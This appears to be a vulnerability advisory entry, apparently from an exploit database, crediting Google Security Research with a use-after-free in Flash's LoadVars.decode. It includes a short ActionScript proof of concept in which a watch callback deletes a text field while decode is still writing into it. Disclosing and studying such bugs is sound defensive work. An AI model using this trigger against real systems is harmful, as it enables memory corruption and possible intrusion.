vendor:
N/A
by:
Google Security Research
N/A
CVSS
N/A
Use-After-Free
N/A
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Chrome on 64-bit Ubuntu
2020
Use-After-Free in LoadVars.decode
There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:

    var lv = new LoadVars();
    var f = lv.decode;
    var tf = this.createTextField('tf', 1, 2, 3, 4, 5);
    tf.natalie = 'not test';
    // Set a watch on the property that decode will assign.
    tf.watch('natalie', func);
    // Decode into the text field; assigning 'natalie' triggers the watch.
    f.call(tf, 'natalie=test&bob=1');
    trace(tf.natalie);

    // Watch callback: deletes the object that decode is still writing into.
    function func() {
        trace('here');
        tf.removeTextField();
        return 'test';
    }
Mitigation:
N/A